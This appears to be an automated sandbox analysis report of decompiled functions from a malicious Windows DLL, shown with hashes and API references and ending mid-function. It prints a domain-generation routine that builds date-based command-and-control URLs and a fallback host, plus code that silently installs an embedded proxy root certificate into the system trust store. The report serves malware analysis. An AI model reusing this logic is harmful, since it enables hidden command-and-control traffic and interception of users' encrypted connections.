Opcode Fuzzy Hash: df3a10f6024f408f15b2ad5c72ac785c734b8422dadc8378e0f8f39ab19adcd3
Instruction Fuzzy Hash: 54D0927494924CEBCB10DFA4D988A8DB7F8EB09651F204595ED0997201D6319EC09AA4

Uniqueness

Uniqueness Score: -1.00%

Function 1001AB20, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001AB20(struct HINSTANCE__* _a4) {
				int _t3;

				_t3 = FreeLibrary(_a4); // executed
				return _t3;
			}

0x1001ab27
0x1001ab2e

APIs

FreeLibrary.KERNEL32(?), ref: 1001AB27

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ab945b5bb3a6449f56287117bc969cb560d4c6e8115a263d146fdd92f26bef0a
Instruction ID: 0a2297a1539f5fd842531728876dcceabbf5482a0c4fce057fc6f77852d15200
Opcode Fuzzy Hash: ab945b5bb3a6449f56287117bc969cb560d4c6e8115a263d146fdd92f26bef0a
Instruction Fuzzy Hash: BBB0123200031CABCE005BD8D8888C537AC96085117010000F70C83100CA30F48046D4

Uniqueness

Uniqueness Score: -1.00%

Function 1000EC31, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000EC31(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;
				void* _t13;

				E100152B4();
				_push(_a4);
				_t5 = L1000EB34(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
				return _t5;
			}

0x1000ec31
0x1000ec36
0x1000ec42
0x1000ec48

APIs

___security_init_cookie.LIBCMT ref: 1000EC31

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
Instruction ID: e6deafa1040a52db75f664394f4ca8d863cdd32d4507f565b6a3541a6f58ca8f
Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
Instruction Fuzzy Hash: 88B0923A10A340EB8204CB20D482C0FB3A2EBD4311F24C90DF8A61A2558B31EC60EA52

Uniqueness

Uniqueness Score: -1.00%

Function 10004530, Relevance: 1.4, APIs: 1, Instructions: 120
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10004530(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed char* _v56;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				char* _v148;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				char _v188;
				char _v192;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				void* _t63;
				void* _t70;
				void* _t73;
				intOrPtr* _t76;
				intOrPtr _t86;
				intOrPtr _t96;
				void* _t97;
				void* _t100;
				void* _t102;

				_t102 = __eflags;
				_t55 = _a4;
				_t96 = _a8;
				_v184 = E100044A0;
				_v180 = E100044D0;
				_v176 = _t55;
				_v172 = _t55;
				_v168 = _t96;
				_t97 = 0;
				E10007200();
				_v216 = E100046D0;
				_v212 = E100046F0;
				_v200 = E100046D0;
				_v196 = E100046F0;
				E10007540( &_v164, 0);
				_v136 = 0;
				_v136 = _v216( &_v216, _t96);
				_v132 = _t96;
				_v148 =  &_v184;
				_v140 = 0;
				_v144 = 0;
				E100048B0(_t102,  &_v128);
				_t63 = E10006FE0(__ebp, _t102,  &_v128,  &_v164,  &_v216,  &_v200);
				_t100 =  &_v220 + 0x24;
				if(_t63 == 0) {
					_v204 = 0xffffffff;
					_v208 = 0;
					_v220 = 0;
					_v192 = 0;
					_v188 = 0;
					if(( *_v56 & 0x00000080) == 0) {
						_t70 = E10007020( &_v128,  &_v164, 0,  &_v204,  &_v208,  &_v220,  &_v192,  &_v188,  &_v216,  &_v200);
						_t100 = _t100 + 0x28;
						if(_t70 == 0) {
							_t73 = VirtualAlloc(0, _v220 + 1, 0x3000, 4); // executed
							_t97 = _t73;
							if(_t97 != 0) {
								_t76 = _a12;
								_t107 = _t76;
								_t86 = _v220;
								if(_t76 != 0) {
									 *_t76 = _t86;
								}
								E1000D1F0(0, _t96, _t97, _t97, _v208, _t86);
								_t100 = _t100 + 0xc;
								 *((char*)(_v220 + _t97)) = 0;
							}
							_v212( &_v216, _v208);
							_t100 = _t100 + 8;
						}
					}
				}
				E100048F0(_t107,  &_v128,  &_v216);
				return _t97;
			}

0x10004530
0x10004536
0x10004540
0x10004547
0x1000454f
0x10004557
0x1000455b
0x1000455f
0x10004565
0x10004567
0x10004572
0x1000457a
0x10004582
0x1000458a
0x10004592
0x1000459d
0x100045a5
0x100045b2
0x100045b6
0x100045ba
0x100045be
0x100045c2
0x100045de
0x100045e3
0x100045e8
0x100045f5
0x100045fd
0x10004601
0x10004605
0x10004609
0x10004610
0x10004647
0x1000464c
0x10004651
0x10004663
0x10004669
0x1000466d
0x1000466f
0x10004676
0x10004678
0x1000467c
0x1000467e
0x1000467e
0x10004687
0x10004690
0x10004693
0x10004693
0x100046a0
0x100046a4
0x100046a4
0x10004651
0x10004610
0x100046b1
0x100046c4

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10004663

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5a1338e426cb75d2ca51680c2dac79a4975bfac74c382e52e88c4a0326a2e4fd
Instruction ID: 6d5649bfcbb4bdf90b27f5f2c4f34706eb8148ffe7853cac92dd8e65470b9804
Opcode Fuzzy Hash: 5a1338e426cb75d2ca51680c2dac79a4975bfac74c382e52e88c4a0326a2e4fd
Instruction Fuzzy Hash: E34129B2408341AFD310CF54D88099BBBE8FBC8284F414A2EF59587215EB71E549CFA7

Uniqueness

Uniqueness Score: -1.00%

Function 1001AB80, Relevance: 1.3, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001AB80(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}

0x1001ab8f
0x1001ab96

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 1001AB8F

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c9b92633b5be4d05357bd559152b14f70f0dc8abda5fe75a7777c4d758cee15d
Instruction ID: b8619c9825cd0fa0e3a42403664708fb370f354c31c9415efada841c1c062db3
Opcode Fuzzy Hash: c9b92633b5be4d05357bd559152b14f70f0dc8abda5fe75a7777c4d758cee15d
Instruction Fuzzy Hash: 29C04C7611420CABCB04DF98DCC4CAB37BDAB8C710B108508FB1D87200CA34F9518BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10022710, Relevance: 31.8, APIs: 7, Strings: 11, Instructions: 292
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E10022710(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8) {
				char _v8;
				intOrPtr _v16;
				signed int _v20;
				struct _SYSTEMTIME _v36;
				char _v303;
				char _v304;
				char _v332;
				char _v360;
				char _v388;
				char _v416;
				char _v444;
				char _v472;
				char _v500;
				char _v528;
				char _v556;
				char _v584;
				char _v612;
				char _v640;
				char _v668;
				signed int _v672;
				signed int _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				signed int _v756;
				signed int _v760;
				signed int _v764;
				signed int _v768;
				signed int _v772;
				intOrPtr _t224;

				_push(0xffffffff);
				_push(E10023135);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t224;
				_v672 = 0;
				E10001160( &_v332, __eflags, "http://");
				_v8 = 0;
				_v20 = 0;
				_v304 = 0;
				E1000CF80(__edi,  &_v303, 0, 0x103);
				_v36.wYear = 0;
				_v36.wMonth = 0;
				_v36.wDay = 0;
				_v36.wMinute = 0;
				_v36.wMilliseconds = 0;
				GetLocalTime( &_v36);
				_v676 = _a8;
				_t231 = _v676 - 6;
				if(_v676 <= 6) {
					switch( *((intOrPtr*)(_v676 * 4 +  &M10022CD8))) {
						case 0:
							_push(_v36.wMonth & 0x0000ffff);
							E1000CCA3(_t222,  &_v304, "hellojackma%04d%02d", _v36.wYear & 0x0000ffff);
							_v20 = E1001A4E0(__ebx,  &_v304, _t222, __esi, _t231,  &_v304);
							_v680 = E10001160( &_v360, _t231, _v20);
							_v684 = _v680;
							_v8 = 1;
							E10001A90( &_v332, _v684);
							_v8 = 0;
							E100011A0( &_v360);
							_push(_v20);
							E1000CA40(__ebx, _t222, __esi, _t231);
							_v688 = E10001160( &_v388, _t231, ".com/");
							_v692 = _v688;
							_v8 = 2;
							E10001A90( &_v332, _v692);
							_v8 = 0;
							E100011A0( &_v388);
							goto L9;
						case 1:
							__eax = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__ecx = _v36.wYear & 0x0000ffff;
							__edx =  &_v304;
							E1000CCA3(__edi, __edx, "hellojackma%04d%02d1", _v36.wYear & 0x0000ffff) =  &_v304;
							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
							__ecx = _v20;
							__ecx =  &_v416;
							_v696 = E10001160( &_v416, __eflags, _v20);
							__edx = _v696;
							_v700 = _v696;
							_v8 = 3;
							__eax = _v700;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v700);
							_v8 = 0;
							__ecx =  &_v416;
							__eax = E100011A0( &_v416);
							__ecx = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v444;
							_v704 = E10001160( &_v444, __eflags, ".com/");
							__edx = _v704;
							_v708 = _v704;
							_v8 = 4;
							__eax = _v708;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v708);
							_v8 = 0;
							__ecx =  &_v444;
							__eax = E100011A0(__ecx);
							goto L9;
						case 2:
							__ecx = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__edx = _v36.wYear & 0x0000ffff;
							 &_v304 = E1000CCA3(__edi,  &_v304, "hellojackma%04d%02d2", __edx);
							__ecx =  &_v304;
							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
							__edx = _v20;
							__ecx =  &_v472;
							_v712 = E10001160( &_v472, __eflags, _v20);
							__eax = _v712;
							_v716 = _v712;
							_v8 = 5;
							__ecx = _v716;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v716);
							_v8 = 0;
							__ecx =  &_v472;
							__eax = E100011A0( &_v472);
							__edx = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v500;
							_v720 = E10001160( &_v500, __eflags, ".com/");
							__eax = _v720;
							_v724 = _v720;
							_v8 = 6;
							__ecx = _v724;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v724);
							_v8 = 0;
							__ecx =  &_v500;
							__eax = E100011A0(__ecx);
							goto L9;
						case 3:
							__edx = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__eax = _v36.wYear & 0x0000ffff;
							__ecx =  &_v304;
							__eax = E1000CCA3(__edi,  &_v304, "hellojackma%04d%02d3", _v36.wYear & 0x0000ffff);
							__edx =  &_v304;
							_v20 = E1001A4E0(__ebx,  &_v304, __edi, __esi, __eflags,  &_v304);
							__eax = _v20;
							__ecx =  &_v528;
							_v728 = E10001160( &_v528, __eflags, _v20);
							__ecx = _v728;
							_v732 = _v728;
							_v8 = 7;
							__edx = _v732;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v732);
							_v8 = 0;
							__ecx =  &_v528;
							E100011A0( &_v528) = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v556;
							_v736 = E10001160( &_v556, __eflags, ".com/");
							__ecx = _v736;
							_v740 = _v736;
							_v8 = 8;
							__edx = _v740;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v740);
							_v8 = 0;
							__ecx =  &_v556;
							__eax = E100011A0(__ecx);
							goto L9;
						case 4:
							__eax = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__ecx = _v36.wYear & 0x0000ffff;
							__edx =  &_v304;
							E1000CCA3(__edi, __edx, "hellojackma%04d%02d4", _v36.wYear & 0x0000ffff) =  &_v304;
							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
							__ecx = _v20;
							__ecx =  &_v584;
							_v744 = E10001160( &_v584, __eflags, _v20);
							__edx = _v744;
							_v748 = _v744;
							_v8 = 9;
							__eax = _v748;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v748);
							_v8 = 0;
							__ecx =  &_v584;
							__eax = E100011A0( &_v584);
							__ecx = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v612;
							_v752 = E10001160( &_v612, __eflags, ".com/");
							__edx = _v752;
							_v756 = _v752;
							_v8 = 0xa;
							__eax = _v756;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v756);
							_v8 = 0;
							__ecx =  &_v612;
							__eax = E100011A0(__ecx);
							goto L9;
						case 5:
							__ecx = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__edx = _v36.wYear & 0x0000ffff;
							 &_v304 = E1000CCA3(__edi,  &_v304, "hellojackma%04d%02d5", __edx);
							__ecx =  &_v304;
							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
							__edx = _v20;
							__ecx =  &_v640;
							_v760 = E10001160( &_v640, __eflags, _v20);
							__eax = _v760;
							_v764 = _v760;
							_v8 = 0xb;
							__ecx = _v764;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v764);
							_v8 = 0;
							__ecx =  &_v640;
							__eax = E100011A0( &_v640);
							__edx = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v668;
							_v768 = E10001160( &_v668, __eflags, ".com/");
							__eax = _v768;
							_v772 = _v768;
							_v8 = 0xc;
							__ecx = _v772;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v772);
							_v8 = 0;
							__ecx =  &_v668;
							__eax = E100011A0(__ecx);
							goto L9;
						case 6:
							__ecx =  &_v332;
							__eax = E10001AB0(__ecx, __eflags, "back19e64ea00d6ecfe1.io/");
							goto L9;
					}
				}
				L9:
				E10001110(_a4, _t231,  &_v332);
				_v672 = _v672 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v332);
				 *[fs:0x0] = _v16;
				return _a4;
			}

APIs

_memset.LIBCMT ref: 1002276B
GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C
_sprintf.LIBCMT ref: 100227CB
_sprintf.LIBCMT ref: 10022899
_sprintf.LIBCMT ref: 10022967
_sprintf.LIBCMT ref: 10022A35
_sprintf.LIBCMT ref: 10022B03

Strings

.com/, xrefs: 10022AA1
.com/, xrefs: 100229D3
hellojackma%04d%02d4, xrefs: 10022AF7
hellojackma%04d%02d1, xrefs: 1002288D
.com/, xrefs: 10022B6F
hellojackma%04d%02d3, xrefs: 10022A29
.com/, xrefs: 10022905
.com/, xrefs: 10022837
hellojackma%04d%02d2, xrefs: 1002295B
hellojackma%04d%02d, xrefs: 100227BF
http://, xrefs: 10022738

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _sprintf$LocalTime_memset
String ID: .com/$.com/$.com/$.com/$.com/$hellojackma%04d%02d$hellojackma%04d%02d1$hellojackma%04d%02d2$hellojackma%04d%02d3$hellojackma%04d%02d4$http://
API String ID: 3210278488-2045531967
Opcode ID: 58d957640680e71f0094738768f0cd503e29c45d9e3b51a34d4dd2ed5c8d334e
Instruction ID: fb4cb11577b3c86e7dfd5e3107c57607ba699950bdf5b0f3fc4b2b3aa76d18be
Opcode Fuzzy Hash: 58d957640680e71f0094738768f0cd503e29c45d9e3b51a34d4dd2ed5c8d334e
Instruction Fuzzy Hash: E3D137B5C012689BEB24DBA4CC85BEEB7B4FF59340F5041D9E10967291EB346B84CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1001F780, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 177
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E1001F780(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				char* _v16;
				BYTE* _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				char _v299;
				char _v300;
				char _v563;
				char _v564;
				signed int _v568;
				void* __ebp;
				BYTE* _t66;
				int _t69;
				int _t70;
				int _t71;
				long _t72;
				int _t75;
				signed int _t90;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t127;

				_t119 = __esi;
				_t118 = __edi;
				_t91 = __ebx;
				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
				_v24 = 0;
				_v8 = 0;
				_v28 = 0;
				_v12 = 0;
				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
					_t66 = L1000CEAF(__ebx, _v12, __edi, __esi, _v12);
					_t122 = _t121 + 4;
					_v20 = _t66;
					_t133 = _v20;
					if(_v20 != 0) {
						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
						_t69 = _v12;
						__imp__CertCreateCertificateContext(1, _v20, _t69);
						_v8 = _t69;
						_push(_v20);
						_t70 = E1000CA40(__ebx, __edi, __esi, _t133);
						_t123 = _t122 + 4;
						if(_v8 != 0) {
							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root");
							_v28 = _t70;
							if(_v28 != 0) {
								_t71 = _v8;
								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0);
								if(_t71 == 0) {
									_t72 = GetLastError();
									__eflags = _t72 - 0x80092005;
									if(_t72 == 0x80092005) {
										_v36 = 0;
										_v32 = 0;
										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
										__eflags = _v36;
										if(_v36 > 0) {
											_t75 = L1000CEAF(__ebx,  &_v36, __edi, __esi, _v36 + 1);
											_t124 = _t123 + 4;
											_v32 = _t75;
											__eflags = _v32;
											if(_v32 != 0) {
												E1000CF80(_t118, _v32, 0, _v36 + 1);
												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
												_v564 = 0;
												E1000CF80(_t118,  &_v563, 0, 0x103);
												_v300 = 0;
												E1000CF80(_t118,  &_v299, 0, 0x103);
												_t127 = _t124 + 0x24;
												_v568 = 0;
												while(1) {
													__eflags = _v568 - _v36;
													if(_v568 >= _v36) {
														break;
													}
													E1000CCA3(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
													_t127 = _t127 + 0xc;
													_t90 = _v568 + 1;
													__eflags = _t90;
													_v568 = _t90;
												}
												E1000CCA3(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
												_v24 = E1001F6E0(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
												_push(_v32);
												E1000CA40(_t91, _t118, _t119, __eflags);
											}
										}
									}
								} else {
									_v24 = 1;
								}
								__imp__CertCloseStore(_v28, 1);
							}
							__imp__CertFreeCertificateContext(_v8);
						}
					}
				}
				return _v24;
			}

APIs

CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7BE
CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F803
CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F813

Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F842
CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F861
GetLastError.KERNEL32 ref: 1001F877
CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F8A2
_memset.LIBCMT ref: 1001F8DB
CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F8F1
_memset.LIBCMT ref: 1001F90C
_memset.LIBCMT ref: 1001F929
_sprintf.LIBCMT ref: 1001F97C
_sprintf.LIBCMT ref: 1001F999
CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F9D2
CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F9DC

Strings

Software\Microsoft\SystemCertificates\Root\Certificates\%s, xrefs: 1001F98D
%02X, xrefs: 1001F969
Root, xrefs: 1001F832

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
API String ID: 3311258246-1857994723
Opcode ID: 63b9e931f9e6ea3a18635dc1151556d7a84b7ea401bf4b8b6418afc7e82c127b
Instruction ID: 735c7eb008ba94e8865f05c141388d8d9a48af4fd13d1d85c3f126029706ba6d
Opcode Fuzzy Hash: 63b9e931f9e6ea3a18635dc1151556d7a84b7ea401bf4b8b6418afc7e82c127b
Instruction Fuzzy Hash: B76133B5D00219AFEB10DF90CC99FFEB7B4EB48704F104598E605AB181D7B5AA85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1001D840, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E1001D840(void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed short* _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				char _v570;
				short _v572;
				char _v1596;
				void* _v1600;
				char _v1604;
				long _v1608;
				signed int _v1612;
				void* _v1616;
